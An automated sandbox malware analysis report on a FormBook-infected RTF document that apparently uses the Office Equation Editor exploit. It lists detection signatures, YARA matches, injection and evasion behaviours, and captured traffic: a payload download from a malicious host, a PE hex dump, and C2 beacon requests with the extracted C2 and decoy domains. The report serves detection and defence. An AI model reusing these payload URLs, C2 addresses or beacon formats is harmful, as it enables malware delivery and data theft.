Analysis Report c8080fbf_by_Libranalysis

Overview

General Information

Sample Name:	c8080fbf_by_Libranalysis (renamed file extension from none to rtf)
Analysis ID:	403424
MD5:	c8080fbfc825b01f11973566f1a3e589
SHA1:	9aa04e64414bef6504b211615f7fcdbe84cd75df
SHA256:	af801e43101c06e3366d942715a8b10f90f12ec3437cab1b8a0cc3872101eebe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://carbinz.gq/modex/prosperx.exe

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.shoprodeovegas.com/xcl/"], "decoy": ["sewingtherose.com", "thesmartshareholder.com", "afasyah.com", "marolamusic.com", "lookupgeorgina.com", "plataforyou.com", "dijcan.com", "pawtyparcels.com", "interprediction.com", "fairerfinancehackathon.net", "thehmnshop.com", "jocelynlopez.com", "launcheffecthouston.com", "joyeveryminute.com", "spyforu.com", "ronerasanjuan.com", "gadgetsdesi.com", "nmrconsultants.com", "travellpod.com", "ballparksportscards.com", "milehighcitygames.com", "sophieberiault.com", "2020uselectionresult.com", "instantpeindia.com", "topgradetutors.net", "esveb.com", "rftjrsrv.net", "raphacall.com", "wangrenkai.com", "programme-zeste.com", "idtiam.com", "cruzealmeidaarquitetura.com", "hidbatteries.com", "print12580.com", "realmartagent.com", "tpsmg.com", "mamapacho.com", "rednetmarketing.com", "syuan.xyz", "floryi.com", "photograph-gallery.com", "devarajantraders.com", "amarak-uniform.com", "20190606.com", "retailhutbd.net", "craftbrewllc.com", "myfreezic.com", "crystalwiththecrystalz.com", "ghallagherstudent.com", "britishretailawards.com", "thegoldenwork.com", "dineztheunique.com", "singlelookin.com", "siyuanshe.com", "apgfinancing.com", "slicktechgadgets.com", "wellemade.com", "samytango.com", "centaurme.com", "shuairui.net", "styleket.com", "wpcfences.com", "opolclothing.com", "localiser.site"]}

Multi AV Scanner detection for domain / URL

Source: carbinz.gq

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dll	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Roaming\propser16364.exe	ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: c8080fbf_by_Libranalysis.rtf	Virustotal: Detection: 50%			Perma Link
Source: c8080fbf_by_Libranalysis.rtf	ReversingLabs: Detection: 51%

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.1.propser16364.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.propser16364.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.propser16364.exe.450000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\propser16364.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\propser16364.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: propser16364.exe, NAPSTAT.EXE
Source:	Binary string: napstat.pdb source: propser16364.exe, 00000005.00000002.2123186135.0000000002440000.00000040.00000001.sdmp

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	4_2_004059F0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_0040659C FindFirstFileA,FindClose,	4_2_0040659C
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_004027A1 FindFirstFileA,	4_2_004027A1

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4x nop then pop edi		5_2_0040E445
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 4x nop then pop edi		7_2_0008E445

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: carbinz.gq

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.shoprodeovegas.com/xcl/

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 May 2021 03:37:00 GMTContent-Type: application/x-msdownloadContent-Length: 233896Last-Modified: Mon, 03 May 2021 00:19:56 GMTConnection: keep-aliveETag: "608f41ac-391a8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e4 d6 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 d0 01 00 00 04 00 00 61 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 84 00 00 a0 00 00 00 00 d0 02 00 c8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3c 62 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 74 12 00 00 00 80 00 00 00 14 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 a8 01 00 00 a0 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 0b 00 00 00 d0 02 00 00 0c 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xcl/?ZVeHz=RmzwS/19amak9riNwxnkKWY/GrwQkk+Z9h+s+sO794NmAWuM+4hewKU4PkGr68hD/xJogQ==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1Host: www.devarajantraders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xcl/?ZVeHz=BgLP7+VyAbe+irQ8z0wpLO49yx16Kwx4jjQ33/W3X+9zq2VbrBj/CRN5ENeCInervJ/P3w==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1Host: www.photograph-gallery.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.239.243.112 185.239.243.112

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
Source: Joe Sandbox View	ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /modex/prosperx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gqConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0EAA9687-30AB-4901-9D2A-3CE504568F55}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /modex/prosperx.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gqConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xcl/?ZVeHz=RmzwS/19amak9riNwxnkKWY/GrwQkk+Z9h+s+sO794NmAWuM+4hewKU4PkGr68hD/xJogQ==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1Host: www.devarajantraders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xcl/?ZVeHz=BgLP7+VyAbe+irQ8z0wpLO49yx16Kwx4jjQ33/W3X+9zq2VbrBj/CRN5ENeCInervJ/P3w==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1Host: www.photograph-gallery.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: carbinz.gq

Source: explorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: propser16364.exe, propser16364.exe, 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp, propser16364.exe, 00000005.00000000.2082976494.000000000040A000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: propser16364.exe, 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp, propser16364.exe, 00000005.00000000.2082976494.000000000040A000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: propser16364.exe, 00000004.00000002.2091013839.0000000001E80000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.2098818599.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2103498996.0000000008471000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2091126769.00000000002BB000.00000004.00000020.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: propser16364.exe, 00000004.00000002.2091013839.0000000001E80000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpeM9
Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpxe
Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp2
Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2091092404.0000000000260000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2091092404.0000000000260000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2096418331.00000000041AD000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.2103498996.0000000008471000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.2096418331.00000000041AD000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1/
Source: explorer.exe, 00000006.00000000.2096418331.00000000041AD000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=17
Source: explorer.exe, 00000006.00000000.2103498996.0000000008471000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 4_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_0040548D

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\propser16364.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419D60 NtCreateFile,	5_2_00419D60
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419E10 NtReadFile,	5_2_00419E10
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419E90 NtClose,	5_2_00419E90
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419F40 NtAllocateVirtualMemory,	5_2_00419F40
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419E0A NtReadFile,	5_2_00419E0A
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419E8A NtClose,	5_2_00419E8A
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419F3F NtAllocateVirtualMemory,	5_2_00419F3F
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008300C4 NtCreateFile,LdrInitializeThunk,	5_2_008300C4
